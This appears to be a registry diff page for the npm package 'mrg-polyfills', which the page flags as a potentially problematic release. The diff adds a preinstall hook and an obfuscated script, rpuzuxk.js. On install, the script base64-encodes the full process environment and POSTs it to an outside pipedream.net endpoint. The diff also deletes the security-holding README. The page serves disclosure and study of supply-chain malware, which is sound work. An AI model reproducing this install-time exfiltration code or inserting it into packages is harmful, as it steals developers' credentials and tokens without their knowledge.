mrg-polyfills 0.0.1-security → 4.819.325
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of mrg-polyfills might be problematic. Click here for more details.
- package/package.json +8 -3
- package/rpuzuxk.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "mrg-polyfills",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "4.819.325",
|
|
4
|
+
"main": "rpuzuxk.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node rpuzuxk.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/rpuzuxk.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x363d(_0x1f647d,_0x360a80){const _0x3759bf=a0_0x3759();return a0_0x363d=function(_0x363db0,_0x5653e4){_0x363db0=_0x363db0-0x111;let _0x5333f4=_0x3759bf[_0x363db0];return _0x5333f4;},a0_0x363d(_0x1f647d,_0x360a80);}const a0_0x9ec4a9=a0_0x363d;(function(_0x11bef4,_0x2ced83){const _0x564d78=a0_0x363d,_0x287832=_0x11bef4();while(!![]){try{const _0x307691=parseInt(_0x564d78(0x112))/0x1+-parseInt(_0x564d78(0x117))/0x2+parseInt(_0x564d78(0x11a))/0x3+parseInt(_0x564d78(0x113))/0x4*(-parseInt(_0x564d78(0x11d))/0x5)+parseInt(_0x564d78(0x123))/0x6*(parseInt(_0x564d78(0x11f))/0x7)+-parseInt(_0x564d78(0x120))/0x8*(-parseInt(_0x564d78(0x126))/0x9)+-parseInt(_0x564d78(0x116))/0xa*(parseInt(_0x564d78(0x11b))/0xb);if(_0x307691===_0x2ced83)break;else _0x287832['push'](_0x287832['shift']());}catch(_0x5885e2){_0x287832['push'](_0x287832['shift']());}}}(a0_0x3759,0x23735));const http=require(a0_0x9ec4a9(0x119));function a0_0x3759(){const _0x42b719=['join','84120NjxRtK','117468cKwvlN','base64','https','414807lFSOao','319MsLrog','env','35eGDTDO','d967104b6c9e3e7ee7e7f8bad1ba7209','7sefMPZ','110296eEutIV','request','stringify','283902hcEvJG','from','toString','81ucdFsT','write','net','POST','250288suTAnQ','64040ODyhlA','end'];a0_0x3759=function(){return _0x42b719;};return a0_0x3759();}req=http[a0_0x9ec4a9(0x121)]({'host':[a0_0x9ec4a9(0x11e),'m','pipedream',a0_0x9ec4a9(0x128)][a0_0x9ec4a9(0x115)]('.'),'path':'/'+(process[a0_0x9ec4a9(0x11c)]['npm_package_name']||''),'method':a0_0x9ec4a9(0x111)}),req[a0_0x9ec4a9(0x127)](Buffer[a0_0x9ec4a9(0x124)](JSON[a0_0x9ec4a9(0x122)](process['env']))[a0_0x9ec4a9(0x125)](a0_0x9ec4a9(0x118))),req[a0_0x9ec4a9(0x114)]();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=mrg-polyfills for more information.
|